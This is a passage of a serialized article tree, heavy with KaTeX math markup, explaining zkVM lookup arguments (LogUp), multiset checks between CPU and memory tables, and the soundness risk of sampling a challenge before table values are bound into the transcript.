{"type":25,"tag":216,"props":116824,"children":116825},{"style":116158},[116826,116830],{"type":25,"tag":216,"props":116827,"children":116829},{"className":116828,"style":320},[319],[],{"type":25,"tag":216,"props":116831,"children":116833},{"className":116832},[246,2151],[116834],{"type":31,"value":7171},{"type":25,"tag":216,"props":116836,"children":116837},{"style":116523},[116838,116842],{"type":25,"tag":216,"props":116839,"children":116841},{"className":116840,"style":320},[319],[],{"type":25,"tag":216,"props":116843,"children":116845},{"className":116844,"style":116382},[116180],[116846],{"type":25,"tag":216,"props":116847,"children":116849},{"className":116848,"style":116256},[116255],[116850],{"type":25,"tag":38236,"props":116851,"children":116852},{"xmlns":116260,"width":116261,"height":116262,"style":116263,"viewBox":116264,"preserveAspectRatio":116265},[116853],{"type":25,"tag":116268,"props":116854,"children":116855},{"d":116270},[],{"type":25,"tag":216,"props":116857,"children":116859},{"className":116858},[1864],[116860],{"type":31,"value":1867},{"type":25,"tag":216,"props":116862,"children":116864},{"className":116863,"style":1871},[257],[],{"type":25,"tag":216,"props":116866,"children":116868},{"className":116867},[246,116141],[116869],{"type":25,"tag":216,"props":116870,"children":116872},{"className":116871},[298],[116873],{"type":25,"tag":216,"props":116874,"children":116876},{"className":116875},[304],[116877],{"type":25,"tag":216,"props":116878,"children":116880},{"className":116879,"style":116226},[309],[116881,116893],{"type":25,"tag":216,"props":116882,"children":116883},{"style":116158},[116884,116888],{"type":25,"tag":216,"props":116885,"children":116887},{"className":116886,"style":320},[319],[],{"type":25,"tag":216,"props":116889,"children":116891},{"className":116890,"style":2752},[246,2151],[116892],{"type":31,"value":97829},{"type":25,"tag":216,"props":116894,"children":116895},{"style":116158},[116896,116900],{"type":25,"tag":216,"props":116897,"children":116899},{"className":116898,"style":320},[319],[],{"type":25,"tag":216,"props":116901,"children":116903},{"className":116902,"style":116250},[116180],[116904],{"type":25,"tag":216,"props":116905,"children":116907},{"className":116906,"style":116256},[116255],[116908],{"type":25,"tag":38236,"props":116909,"children":116910},{"xmlns":116260,"width":116261,"height":116262,"style":116263,"viewBox":116264,"preserveAspectRatio":116265},[116911],{"type":25,"tag":116268,"props":116912,"children":116913},{"d":116270},[],{"type":25,"tag":216,"props":116915,"children":116917},{"className":116916},[427],[116918],{"type":31,"value":1888},{"type":31,"value":116920}," are constants, so ",{"type":25,"tag":82,"props":116922,"children":116924},{"className":116923},[212,4702],[116925],{"type":25,"tag":216,"props":116926,"children":116928},{"className":116927},[224],[116929],{"type":25,"tag":216,"props":116930,"children":116932},{"className":116931,"ariaHidden":230},[229],[116933],{"type":25,"tag":216,"props":116934,"children":116936},{"className":116935},[235],[116937,116941,117001,117006,117055],{"type":25,"tag":216,"props":116938,"children":116940},{"className":116939,"style":116136},[240],[],{"type":25,"tag":216,"props":116942,"children":116944},{"className":116943},[246,116141],[116945],{"type":25,"tag":216,"props":116946,"children":116948},{"className":116947},[298,299],[116949,116990],{"type":25,"tag":216,"props":116950,"children":116952},{"className":116951},[304],[116953,116985],{"type":25,"tag":216,"props":116954,"children":116956},{"className":116955,"style":116154},[309],[116957,116969],{"type":25,"tag":216,"props":116958,"children":116959},{"style":116158},[116960,116964],{"type":25,"tag":216,"props":116961,"children":116963},{"className":116962,"style":320},[319],[],{"type":25,"tag":216,"props":116965,"children":116967},{"className":116966,"style":99359},[246,2151],[116968],{"type":31,"value":37047},{"type":25,"tag":216,"props":116970,"children":116971},{"style":116171},[116972,116976],{"type":25,"tag":216,"props":116973,"children":116975},{"className":116974,"style":320},[319],[],{"type":25,"tag":216,"props":116977,"children":116979},{"className":116978,"style":116181},[116180],[116980],{"type":25,"tag":216,"props":116981,"children":116983},{"className":116982},[246],[116984],{"type":31,"value":116188},{"type":25,"tag":216,"props":116986,"children":116988},{"className":116987},[408],[116989],{"type":31,"value":411},{"type":25,"tag":216,"props":116991,"children":116993},{"className":116992},[304],[116994],{"type":25,"tag":216,"props":116995,"children":116997},{"className":116996,"style":116201},[309],[116998],{"type":25,"tag":216,"props":116999,"children":117000},{},[],{"type":25,"tag":216,"props":117002,"children":117004},{"className":117003},[287],[117005],{"type":31,"value":1850},{"type":25,"tag":216,"props":117007,"children":117009},{"className":117008},[246,116141],[117010],{"type":25,"tag":216,"props":117011,"children":117013},{"className":117012},[298],[117014],{"type":25,"tag":216,"props":117015,"children":117017},{"className":117016},[304],[117018],{"type":25,"tag":216,"props":117019,"children":117021},{"className":117020,"style":116226},[309],[117022,117034],{"type":25,"tag":216,"props":117023,"children":117024},{"style":116158},[117025,117029],{"type":25,"tag":216,"props":117026,"children":117028},{"className":117027,"style":320},[319],[],{"type":25,"tag":216,"props":117030,"children":117032},{"className":117031,"style":2752},[246,2151],[117033],{"type":31,"value":97829},{"type":25,"tag":216,"props":117035,"children":117036},{"style":116158},[117037,117041],{"type":25,"tag":216,"props":117038,"children":117040},{"className":117039,"style":320},[319],[],{"type":25,"tag":216,"props":117042,"children":117044},{"className":117043,"style":116250},[116180],[117045],{"type":25,"tag":216,"props":117046,"children":117048},{"className":117047,"style":116256},[116255],[117049],{"type":25,"tag":38236,"props":117050,"children":117051},{"xmlns":116260,"width":116261,"height":116262,"style":116263,"viewBox":116264,"preserveAspectRatio":116265},[117052],{"type":25,"tag":116268,"props":117053,"children":117054},{"d":116270},[],{"type":25,"tag":216,"props":117056,"children":117058},{"className":117057},[427],[117059],{"type":31,"value":1888},{"type":31,"value":117061}," is linear in the table values ",{"type":25,"tag":82,"props":117063,"children":117065},{"className":117064},[212,4702],[117066],{"type":25,"tag":216,"props":117067,"children":117069},{"className":117068},[224],[117070],{"type":25,"tag":216,"props":117071,"children":117073},{"className":117072,"ariaHidden":230},[229],[117074],{"type":25,"tag":216,"props":117075,"children":117077},{"className":117076},[235],[117078,117082,117087,117092,117141],{"type":25,"tag":216,"props":117079,"children":117081},{"className":117080,"style":116568},[240],[],{"type":25,"tag":216,"props":117083,"children":117085},{"className":117084,"style":99359},[246,2151],[117086],{"type":31,"value":37047},{"type":25,"tag":216,"props":117088,"children":117090},{"className":117089},[287],[117091],{"type":31,"value":1850},{"type":25,"tag":216,"props":117093,"children":117095},{"className":117094},[246,116141],[117096],{"type":25,"tag":216,"props":117097,"children":117099},{"className":117098},[298],[117100],{"type":25,"tag":216,"props":117101,"children":117103},{"className":117102},[304],[117104],{"type":25,"tag":216,"props":117105,"children":117107},{"className":117106,"style":116355},[309],[117108,117120],{"type":25,"tag":216,"props":117109,"children":117110},{"style":116158},[117111,117115],{"type":25,"tag":216,"props":117112,"children":117114},{"className":117113,"style":320},[319],[],{"type":25,"tag":216,"props":117116,"children":117118},{"className":117117},[246,2151],[117119],{"type":31,"value":7171},{"type":25,"tag":216,"props":117121,"children":117122},{"style":116523},[117123,117127],{"type":25,"tag":216,"props":117124,"children":117126},{"className":117125,"style":320},[319],[],{"type":25,"tag":216,"props":117128,"children":117130},{"className":117129,"style":116382},[116180],[117131],{"type":25,"tag":216,"props":117132,"children":117134},{"className":117133,"style":116256},[116255],[117135],{"type":25,"tag":38236,"props":117136,"children":117137},{"xmlns":116260,"width":116261,"height":116262,"style":116263,"viewBox":116264,"preserveAspectRatio":116265},[117138],{"type":25,"tag":116268,"props":117139,"children":117140},{"d":116270},[],{"type":25,"tag":216,"props":117142,"children":117144},{"className":117143},[427],[117145],{"type":31,"value":1888},{"type":31,"value":179},{"type":25,"tag":38,"props":117148,"children":117149},{},[117150,117152,117221],{"type":31,"value":117151},"That linearity is exactly why missing transcript binding is dangerous: if ",{"type":25,"tag":82,"props":117153,"children":117155},{"className":117154},[212,4702],[117156],{"type":25,"tag":216,"props":117157,"children":117159},{"className":117158},[224],[117160],{"type":25,"tag":216,"props":117161,"children":117163},{"className":117162,"ariaHidden":230},[229],[117164],{"type":25,"tag":216,"props":117165,"children":117167},{"className":117166},[235],[117168,117172],{"type":25,"tag":216,"props":117169,"children":117171},{"className":117170,"style":116226},[240],[],{"type":25,"tag":216,"props":117173,"children":117175},{"className":117174},[246,116141],[117176],{"type":25,"tag":216,"props":117177,"children":117179},{"className":117178},[298],[117180],{"type":25,"tag":216,"props":117181,"children":117183},{"className":117182},[304],[117184],{"type":25,"tag":216,"props":117185,"children":117187},{"className":117186,"style":116226},[309],[117188,117200],{"type":25,"tag":216,"props":117189,"children":117190},{"style":116158},[117191,117195],{"type":25,"tag":216,"props":117192,"children":117194},{"className":117193,"style":320},[319],[],{"type":25,"tag":216,"props":117196,"children":117198},{"className":117197,"style":2752},[246,2151],[117199],{"type":31,"value":97829},{"type":25,"tag":216,"props":117201,"children":117202},{"style":116158},[117203,117207],{"type":25,"tag":216,"props":117204,"children":117206},{"className":117205,"style":320},[319],[],{"type":25,"tag":216,"props":117208,"children":117210},{"className":117209,"style":116250},[116180],[117211],{"type":25,"tag":216,"props":117212,"children":117214},{"className":117213,"style":116256},[116255],[117215],{"type":25,"tag":38236,"props":117216,"children":117217},{"xmlns":116260,"width":116261,"height":116262,"style":116263,"viewBox":116264,"preserveAspectRatio":116265},[117218],{"type":25,"tag":116268,"props":117219,"children":117220},{"d":116270},[],{"type":31,"value":117222}," is sampled before those values are bound, an attacker can reprogram values while preserving the same evaluated claim.",{"type":25,"tag":606,"props":117224,"children":117226},{"id":117225},"lookup-arguments-logup",[117227],{"type":31,"value":117228},"Lookup Arguments (LogUp)",{"type":25,"tag":38,"props":117230,"children":117231},{},[117232],{"type":31,"value":117233},"zkVMs need to check that values satisfy certain properties. For example:",{"type":25,"tag":2039,"props":117235,"children":117236},{},[117237,117293,117298],{"type":25,"tag":2043,"props":117238,"children":117239},{},[117240,117242,117292],{"type":31,"value":117241},"Is this byte in range ",{"type":25,"tag":82,"props":117243,"children":117245},{"className":117244},[212,4702],[117246],{"type":25,"tag":216,"props":117247,"children":117249},{"className":117248},[224],[117250],{"type":25,"tag":216,"props":117251,"children":117253},{"className":117252,"ariaHidden":230},[229],[117254],{"type":25,"tag":216,"props":117255,"children":117257},{"className":117256},[235],[117258,117262,117267,117272,117277,117281,117287],{"type":25,"tag":216,"props":117259,"children":117261},{"className":117260,"style":5513},[240],[],{"type":25,"tag":216,"props":117263,"children":117265},{"className":117264},[287],[117266],{"type":31,"value":7701},{"type":25,"tag":216,"props":117268,"children":117270},{"className":117269},[246],[117271],{"type":31,"value":1882},{"type":25,"tag":216,"props":117273,"children":117275},{"className":117274},[1864],[117276],{"type":31,"value":1867},{"type":25,"tag":216,"props":117278,"children":117280},{"className":117279,"style":1871},[257],[],{"type":25,"tag":216,"props":117282,"children":117284},{"className":117283},[246],[117285],{"type":31,"value":117286},"255",{"type":25,"tag":216,"props":117288,"children":117290},{"className":117289},[427],[117291],{"type":31,"value":19368},{"type":31,"value":604},{"type":25,"tag":2043,"props":117294,"children":117295},{},[117296],{"type":31,"value":117297},"Does this opcode decode correctly?",{"type":25,"tag":2043,"props":117299,"children":117300},{},[117301],{"type":31,"value":117302},"Is this memory access consistent with previous accesses?",{"type":25,"tag":38,"props":117304,"children":117305},{},[117306,117311],{"type":25,"tag":9273,"props":117307,"children":117308},{},[117309],{"type":31,"value":117310},"The naive approach:",{"type":31,"value":117312}," Add constraints for each check. Expensive.",{"type":25,"tag":38,"props":117314,"children":117315},{},[117316,117321,117323,117328],{"type":25,"tag":9273,"props":117317,"children":117318},{},[117319],{"type":31,"value":117320},"The clever approach:",{"type":31,"value":117322}," Precompute a table of valid tuples. Prove that every value the program uses appears in the table. This is a ",{"type":25,"tag":9273,"props":117324,"children":117325},{},[117326],{"type":31,"value":117327},"multiset membership",{"type":31,"value":71765},{"type":25,"tag":38,"props":117330,"children":117331},{},[117332,117337],{"type":25,"tag":9273,"props":117333,"children":117334},{},[117335],{"type":31,"value":117336},"LogUp (Logarithmic Derivative):",{"type":31,"value":117338}," Encode multiset membership as a sum of fractions.",{"type":25,"tag":38,"props":117340,"children":117341},{},[117342,117344,117369,117371,117398],{"type":31,"value":117343},"If set ",{"type":25,"tag":82,"props":117345,"children":117347},{"className":117346},[212,4702],[117348],{"type":25,"tag":216,"props":117349,"children":117351},{"className":117350},[224],[117352],{"type":25,"tag":216,"props":117353,"children":117355},{"className":117354,"ariaHidden":230},[229],[117356],{"type":25,"tag":216,"props":117357,"children":117359},{"className":117358},[235],[117360,117364],{"type":25,"tag":216,"props":117361,"children":117363},{"className":117362,"style":4799},[240],[],{"type":25,"tag":216,"props":117365,"children":117367},{"className":117366},[246,2151],[117368],{"type":31,"value":80739},{"type":31,"value":117370}," should equal set ",{"type":25,"tag":82,"props":117372,"children":117374},{"className":117373},[212,4702],[117375],{"type":25,"tag":216,"props":117376,"children":117378},{"className":117377},[224],[117379],{"type":25,"tag":216,"props":117380,"children":117382},{"className":117381,"ariaHidden":230},[229],[117383],{"type":25,"tag":216,"props":117384,"children":117386},{"className":117385},[235],[117387,117391],{"type":25,"tag":216,"props":117388,"children":117390},{"className":117389,"style":4799},[240],[],{"type":25,"tag":216,"props":117392,"children":117395},{"className":117393,"style":117394},[246,2151],"margin-right:0.05017em;",[117396],{"type":31,"value":117397},"B",{"type":31,"value":117399}," as multisets:",{"type":25,"tag":38,"props":117401,"children":117402},{},[117403],{"type":25,"tag":82,"props":117404,"children":117406},{"className":117405},[212,4702],[117407],{"type":25,"tag":216,"props":117408,"children":117410},{"className":117409},[224],[117411],{"type":25,"tag":216,"props":117412,"children":117414},{"className":117413,"ariaHidden":230},[229],[117415,117624],{"type":25,"tag":216,"props":117416,"children":117418},{"className":117417},[235],[117419,117424,117497,117501,117611,117615,117620],{"type":25,"tag":216,"props":117420,"children":117423},{"className":117421,"style":117422},[240],"height:1.2484em;vertical-align:-0.4033em;",[],{"type":25,"tag":216,"props":117425,"children":117427},{"className":117426},[1841],[117428,117433],{"type":25,"tag":216,"props":117429,"children":117431},{"className":117430,"style":25584},[1841,4048,25583],[117432],{"type":31,"value":4052},{"type":25,"tag":216,"props":117434,"children":117436},{"className":117435},[2159],[117437],{"type":25,"tag":216,"props":117438,"children":117440},{"className":117439},[298,299],[117441,117485],{"type":25,"tag":216,"props":117442,"children":117444},{"className":117443},[304],[117445,117480],{"type":25,"tag":216,"props":117446,"children":117449},{"className":117447,"style":117448},[309],"height:0.1786em;",[117450],{"type":25,"tag":216,"props":117451,"children":117452},{"style":25607},[117453,117457],{"type":25,"tag":216,"props":117454,"children":117456},{"className":117455,"style":2181},[319],[],{"type":25,"tag":216,"props":117458,"children":117460},{"className":117459},[2186,2187,2188,2189],[117461],{"type":25,"tag":216,"props":117462,"children":117464},{"className":117463},[246,2189],[117465,117470,117475],{"type":25,"tag":216,"props":117466,"children":117468},{"className":117467},[246,2151,2189],[117469],{"type":31,"value":162},{"type":25,"tag":216,"props":117471,"children":117473},{"className":117472},[263,2189],[117474],{"type":31,"value":25647},{"type":25,"tag":216,"props":117476,"children":117478},{"className":117477},[246,2151,2189],[117479],{"type":31,"value":80739},{"type":25,"tag":216,"props":117481,"children":117483},{"className":117482},[408],[117484],{"type":31,"value":411},{"type":25,"tag":216,"props":117486,"children":117488},{"className":117487},[304],[117489],{"type":25,"tag":216,"props":117490,"children":117493},{"className":117491,"style":117492},[309],"height:0.3271em;",[117494],{"type":25,"tag":216,"props":117495,"children":117496},{},[],{"type":25,"tag":216,"props":117498,"children":117500},{"className":117499,"style":1871},[257],[],{"type":25,"tag":216,"props":117502,"children":117504},{"className":117503},[246],[117505,117509,117607],{"type":25,"tag":216,"props":117506,"children":117508},{"className":117507},[287,288],[],{"type":25,"tag":216,"props":117510,"children":117512},{"className":117511},[293],[117513],{"type":25,"tag":216,"props":117514,"children":117516},{"className":117515},[298,299],[117517,117595],{"type":25,"tag":216,"props":117518,"children":117520},{"className":117519},[304],[117521,117590],{"type":25,"tag":216,"props":117522,"children":117525},{"className":117523,"style":117524},[309],"height:0.8451em;",[117526,117558,117569],{"type":25,"tag":216,"props":117527,"children":117528},{"style":5059},[117529,117533],{"type":25,"tag":216,"props":117530,"children":117532},{"className":117531,"style":320},[319],[],{"type":25,"tag":216,"props":117534,"children":117536},{"className":117535},[2186,2187,2188,2189],[117537],{"type":25,"tag":216,"props":117538,"children":117540},{"className":117539},[246,2189],[117541,117548,117553],{"type":25,"tag":216,"props":117542,"children":117545},{"className":117543,"style":117544},[246,2151,2189],"margin-right:0.04398em;",[117546],{"type":31,"value":117547},"z",{"type":25,"tag":216,"props":117549,"children":117551},{"className":117550},[340,2189],[117552],{"type":31,"value":3378},{"type":25,"tag":216,"props":117554,"children":117556},{"className":117555},[246,2151,2189],[117557],{"type":31,"value":162},{"type":25,"tag":216,"props":117559,"children":117560},{"style":360},[117561,117565],{"type":25,"tag":216,"props":117562,"children":117564},{"className":117563,"style":320},[319],[],{"type":25,"tag":216,"props":117566,"children":117568},{"className":117567,"style":370},[369],[],{"type":25,"tag":216,"props":117570,"children":117572},{"style":117571},"top:-3.394em;",[117573,117577],{"type":25,"tag":216,"props":117574,"children":117576},{"className":117575,"style":320},[319],[],{"type":25,"tag":216,"props":117578,"children":117580},{"className":117579},[2186,2187,2188,2189],[117581],{"type":25,"tag":216,"props":117582,"children":117584},{"className":117583},[246,2189],[117585],{"type":25,"tag":216,"props":117586,"children":117588},{"className":117587},[246,2189],[117589],{"type":31,"value":184},{"type":25,"tag":216,"props":117591,"children":117593},{"className":117592},[408],[117594],{"type":31,"value":411},{"type":25,"tag":216,"props":117596,"children":117598},{"className":117597},[304],[117599],{"type":25,"tag":216,"props":117600,"children":117603},{"className":117601,"style":117602},[309],"height:0.4033em;",[117604],{"type":25,"tag":216,"props":117605,"children":117606},{},[],{"type":25,"tag":216,"props":117608,"children":117610},{"className":117609},[427,288],[],{"type":25,"tag":216,"props":117612,"children":117614},{"className":117613,"style":258},[257],[],{"type":25,"tag":216,"props":117616,"children":117618},{"className":117617},[263],[117619],{"type":31,"value":266},{"type":25,"tag":216,"props":117621,"children":117623},{"className":117622,"style":258},[257],[],{"type":25,"tag":216,"props":117625,"children":117627},{"className":117626},[235],[117628,117632,117704,117708],{"type":25,"tag":216,"props":117629,"children":117631},{"className":117630,"style":117422},[240],[],{"type":25,"tag":216,"props":117633,"children":117635},{"className":117634},[1841],[117636,117641],{"type":25,"tag":216,"props":117637,"children":117639},{"className":117638,"style":25584},[1841,4048,25583],[117640],{"type":31,"value":4052},{"type":25,"tag":216,"props":117642,"children":117644},{"className":117643},[2159],[117645],{"type":25,"tag":216,"props":117646,"children":117648},{"className":117647},[298,299],[117649,117693],{"type":25,"tag":216,"props":117650,"children":117652},{"className":117651},[304],[117653,117688],{"type":25,"tag":216,"props":117654,"children":117657},{"className":117655,"style":117656},[309],"height:0.1864em;",[117658],{"type":25,"tag":216,"props":117659,"children":117660},{"style":25607},[117661,117665],{"type":25,"tag":216,"props":117662,"children":117664},{"className":117663,"style":2181},[319],[],{"type":25,"tag":216,"props":117666,"children":117668},{"className":117667},[2186,2187,2188,2189],[117669],{"type":25,"tag":216,"props":117670,"children":117672},{"className":117671},[246,2189],[117673,117678,117683],{"type":25,"tag":216,"props":117674,"children":117676},{"className":117675},[246,2151,2189],[117677],{"type":31,"value":7171},{"type":25,"tag":216,"props":117679,"children":117681},{"className":117680},[263,2189],[117682],{"type":31,"value":25647},{"type":25,"tag":216,"props":117684,"children":117686},{"className":117685,"style":117394},[246,2151,2189],[117687],{"type":31,"value":117397},{"type":25,"tag":216,"props":117689,"children":117691},{"className":117690},[408],[117692],{"type":31,"value":411},{"type":25,"tag":216,"props":117694,"children":117696},{"className":117695},[304],[117697],{"type":25,"tag":216,"props":117698,"children":117700},{"className":117699,"style":117492},[309],[117701],{"type":25,"tag":216,"props":117702,"children":117703},{},[],{"type":25,"tag":216,"props":117705,"children":117707},{"className":117706,"style":1871},[257],[],{"type":25,"tag":216,"props":117709,"children":117711},{"className":117710},[246],[117712,117716,117809],{"type":25,"tag":216,"props":117713,"children":117715},{"className":117714},[287,288],[],{"type":25,"tag":216,"props":117717,"children":117719},{"className":117718},[293],[117720],{"type":25,"tag":216,"props":117721,"children":117723},{"className":117722},[298,299],[117724,117798],{"type":25,"tag":216,"props":117725,"children":117727},{"className":117726},[304],[117728,117793],{"type":25,"tag":216,"props":117729,"children":117731},{"className":117730,"style":117524},[309],[117732,117762,117773],{"type":25,"tag":216,"props":117733,"children":117734},{"style":5059},[117735,117739],{"type":25,"tag":216,"props":117736,"children":117738},{"className":117737,"style":320},[319],[],{"type":25,"tag":216,"props":117740,"children":117742},{"className":117741},[2186,2187,2188,2189],[117743],{"type":25,"tag":216,"props":117744,"children":117746},{"className":117745},[246,2189],[117747,117752,117757],{"type":25,"tag":216,"props":117748,"children":117750},{"className":117749,"style":117544},[246,2151,2189],[117751],{"type":31,"value":117547},{"type":25,"tag":216,"props":117753,"children":117755},{"className":117754},[340,2189],[117756],{"type":31,"value":3378},{"type":25,"tag":216,"props":117758,"children":117760},{"className":117759},[246,2151,2189],[117761],{"type":31,"value":7171},{"type":25,"tag":216,"props":117763,"children":117764},{"style":360},[117765,117769],{"type":25,"tag":216,"props":117766,"children":117768},{"className":117767,"style":320},[319],[],{"type":25,"tag":216,"props":117770,"children":117772},{"className":117771,"style":370},[369],[],{"type":25,"tag":216,"props":117774,"children":117775},{"style":117571},[117776,117780],{"type":25,"tag":216,"props":117777,"children":117779},{"className":117778,"style":320},[319],[],{"type":25,"tag":216,"props":117781,"children":117783},{"className":117782},[2186,2187,2188,2189],[117784],{"type":25,"tag":216,"props":117785,"children":117787},{"className":117786},[246,2189],[117788],{"type":25,"tag":216,"props":117789,"children":117791},{"className":117790},[246,2189],[117792],{"type":31,"value":184},{"type":25,"tag":216,"props":117794,"children":117796},{"className":117795},[408],[117797],{"type":31,"value":411},{"type":25,"tag":216,"props":117799,"children":117801},{"className":117800},[304],[117802],{"type":25,"tag":216,"props":117803,"children":117805},{"className":117804,"style":117602},[309],[117806],{"type":25,"tag":216,"props":117807,"children":117808},{},[],{"type":25,"tag":216,"props":117810,"children":117812},{"className":117811},[427,288],[],{"type":25,"tag":38,"props":117814,"children":117815},{},[117816,117818,117843],{"type":31,"value":117817},"for random challenge ",{"type":25,"tag":82,"props":117819,"children":117821},{"className":117820},[212,4702],[117822],{"type":25,"tag":216,"props":117823,"children":117825},{"className":117824},[224],[117826],{"type":25,"tag":216,"props":117827,"children":117829},{"className":117828,"ariaHidden":230},[229],[117830],{"type":25,"tag":216,"props":117831,"children":117833},{"className":117832},[235],[117834,117838],{"type":25,"tag":216,"props":117835,"children":117837},{"className":117836,"style":6315},[240],[],{"type":25,"tag":216,"props":117839,"children":117841},{"className":117840,"style":117544},[246,2151],[117842],{"type":31,"value":117547},{"type":31,"value":117844},". If the multisets match, the sums are equal. If they differ, the sums differ with overwhelming probability.",{"type":25,"tag":38,"props":117846,"children":117847},{},[117848,117853],{"type":25,"tag":9273,"props":117849,"children":117850},{},[117851],{"type":31,"value":117852},"In zkVMs:",{"type":31,"value":117854}," Different components emit and consume lookup tuples:",{"type":25,"tag":2039,"props":117856,"children":117857},{},[117858,117945],{"type":25,"tag":2043,"props":117859,"children":117860},{},[117861,117863,117889,117891,117916,117918,117944],{"type":31,"value":117862},"CPU emits: \"I read value ",{"type":25,"tag":82,"props":117864,"children":117866},{"className":117865},[212,4702],[117867],{"type":25,"tag":216,"props":117868,"children":117870},{"className":117869},[224],[117871],{"type":25,"tag":216,"props":117872,"children":117874},{"className":117873,"ariaHidden":230},[229],[117875],{"type":25,"tag":216,"props":117876,"children":117878},{"className":117877},[235],[117879,117883],{"type":25,"tag":216,"props":117880,"children":117882},{"className":117881,"style":6315},[240],[],{"type":25,"tag":216,"props":117884,"children":117886},{"className":117885,"style":2325},[246,2151],[117887],{"type":31,"value":117888},"v",{"type":31,"value":117890}," from address ",{"type":25,"tag":82,"props":117892,"children":117894},{"className":117893},[212,4702],[117895],{"type":25,"tag":216,"props":117896,"children":117898},{"className":117897},[224],[117899],{"type":25,"tag":216,"props":117900,"children":117902},{"className":117901,"ariaHidden":230},[229],[117903],{"type":25,"tag":216,"props":117904,"children":117906},{"className":117905},[235],[117907,117911],{"type":25,"tag":216,"props":117908,"children":117910},{"className":117909,"style":6315},[240],[],{"type":25,"tag":216,"props":117912,"children":117914},{"className":117913},[246,2151],[117915],{"type":31,"value":162},{"type":31,"value":117917}," at time ",{"type":25,"tag":82,"props":117919,"children":117921},{"className":117920},[212,4702],[117922],{"type":25,"tag":216,"props":117923,"children":117925},{"className":117924},[224],[117926],{"type":25,"tag":216,"props":117927,"children":117929},{"className":117928,"ariaHidden":230},[229],[117930],{"type":25,"tag":216,"props":117931,"children":117933},{"className":117932},[235],[117934,117939],{"type":25,"tag":216,"props":117935,"children":117938},{"className":117936,"style":117937},[240],"height:0.6151em;",[],{"type":25,"tag":216,"props":117940,"children":117942},{"className":117941},[246,2151],[117943],{"type":31,"value":2934},{"type":31,"value":24020},{"type":25,"tag":2043,"props":117946,"children":117947},{},[117948,117950,117975,117977,118002,118004,118029],{"type":31,"value":117949},"Memory table consumes: \"At time ",{"type":25,"tag":82,"props":117951,"children":117953},{"className":117952},[212,4702],[117954],{"type":25,"tag":216,"props":117955,"children":117957},{"className":117956},[224],[117958],{"type":25,"tag":216,"props":117959,"children":117961},{"className":117960,"ariaHidden":230},[229],[117962],{"type":25,"tag":216,"props":117963,"children":117965},{"className":117964},[235],[117966,117970],{"type":25,"tag":216,"props":117967,"children":117969},{"className":117968,"style":117937},[240],[],{"type":25,"tag":216,"props":117971,"children":117973},{"className":117972},[246,2151],[117974],{"type":31,"value":2934},{"type":31,"value":117976},", address ",{"type":25,"tag":82,"props":117978,"children":117980},{"className":117979},[212,4702],[117981],{"type":25,"tag":216,"props":117982,"children":117984},{"className":117983},[224],[117985],{"type":25,"tag":216,"props":117986,"children":117988},{"className":117987,"ariaHidden":230},[229],[117989],{"type":25,"tag":216,"props":117990,"children":117992},{"className":117991},[235],[117993,117997],{"type":25,"tag":216,"props":117994,"children":117996},{"className":117995,"style":6315},[240],[],{"type":25,"tag":216,"props":117998,"children":118000},{"className":117999},[246,2151],[118001],{"type":31,"value":162},{"type":31,"value":118003}," contained ",{"type":25,"tag":82,"props":118005,"children":118007},{"className":118006},[212,4702],[118008],{"type":25,"tag":216,"props":118009,"children":118011},{"className":118010},[224],[118012],{"type":25,"tag":216,"props":118013,"children":118015},{"className":118014,"ariaHidden":230},[229],[118016],{"type":25,"tag":216,"props":118017,"children":118019},{"className":118018},[235],[118020,118024],{"type":25,"tag":216,"props":118021,"children":118023},{"className":118022,"style":6315},[240],[],{"type":25,"tag":216,"props":118025,"children":118027},{"className":118026,"style":2325},[246,2151],[118028],{"type":31,"value":117888},{"type":31,"value":24020},{"type":25,"tag":38,"props":118031,"children":118032},{},[118033],{"type":31,"value":118034},"If everything balances, the execution is consistent.",{"type":25,"tag":38,"props":118036,"children":118037},{},[118038,118043],{"type":25,"tag":9273,"props":118039,"children":118040},{},[118041],{"type":31,"value":118042},"The claimed_sum:",{"type":31,"value":118044}," Each component computes its contribution to the LogUp sum:",{"type":25,"tag":38,"props":118046,"children":118047},{},[118048],{"type":25,"tag":82,"props":118049,"children":118051},{"className":118050},[212,4702],[118052],{"type":25,"tag":216,"props":118053,"children":118055},{"className":118054},[224],[118056],{"type":25,"tag":216,"props":118057,"children":118059},{"className":118058,"ariaHidden":230},[229],[118060,118158,118409],{"type":25,"tag":216,"props":118061,"children":118063},{"className":118062},[235],[118064,118068,118078,118083,118145,118149,118154],{"type":25,"tag":216,"props":118065,"children":118067},{"className":118066,"style":241},[240],[],{"type":25,"tag":216,"props":118069,"children":118071},{"className":118070},[246,31],[118072],{"type":25,"tag":216,"props":118073,"children":118075},{"className":118074},[246],[118076],{"type":31,"value":118077},"claimed",{"type":25,"tag":216,"props":118079,"children":118081},{"className":118080,"style":2752},[246],[118082],{"type":31,"value":7031},{"type":25,"tag":216,"props":118084,"children":118086},{"className":118085},[246],[118087,118096],{"type":25,"tag":216,"props":118088,"children":118090},{"className":118089},[246,31],[118091],{"type":25,"tag":216,"props":118092,"children":118094},{"className":118093},[246],[118095],{"type":31,"value":80604},{"type":25,"tag":216,"props":118097,"children":118099},{"className":118098},[2159],[118100],{"type":25,"tag":216,"props":118101,"children":118103},{"className":118102},[298,299],[118104,118134],{"type":25,"tag":216,"props":118105,"children":118107},{"className":118106},[304],[118108,118129],{"type":25,"tag":216,"props":118109,"children":118111},{"className":118110,"style":2270},[309],[118112],{"type":25,"tag":216,"props":118113,"children":118115},{"style":118114},"top:-2.55em;margin-right:0.05em;",[118116,118120],{"type":25,"tag":216,"props":118117,"children":118119},{"className":118118,"style":2181},[319],[],{"type":25,"tag":216,"props":118121,"children":118123},{"className":118122},[2186,2187,2188,2189],[118124],{"type":25,"tag":216,"props":118125,"children":118127},{"className":118126},[246,2151,2189],[118128],{"type":31,"value":2289},{"type":25,"tag":216,"props":118130,"children":118132},{"className":118131},[408],[118133],{"type":31,"value":411},{"type":25,"tag":216,"props":118135,"children":118137},{"className":118136},[304],[118138],{"type":25,"tag":216,"props":118139,"children":118141},{"className":118140,"style":2209},[309],[118142],{"type":25,"tag":216,"props":118143,"children":118144},{},[],{"type":25,"tag":216,"props":118146,"children":118148},{"className":118147,"style":258},[257],[],{"type":25,"tag":216,"props":118150,"children":118152},{"className":118151},[263],[118153],{"type":31,"value":266},{"type":25,"tag":216,"props":118155,"children":118157},{"className":118156,"style":258},[257],[],{"type":25,"tag":216,"props":118159,"children":118161},{"className":118160},[235],[118162,118167,118227,118231,118396,118400,118405],{"type":25,"tag":216,"props":118163,"children":118166},{"className":118164,"style":118165},[240],"height:1.3874em;vertical-align:-0.5423em;",[],{"type":25,"tag":216,"props":118168,"children":118170},{"className":118169},[1841],[118171,118176],{"type":25,"tag":216,"props":118172,"children":118174},{"className":118173,"s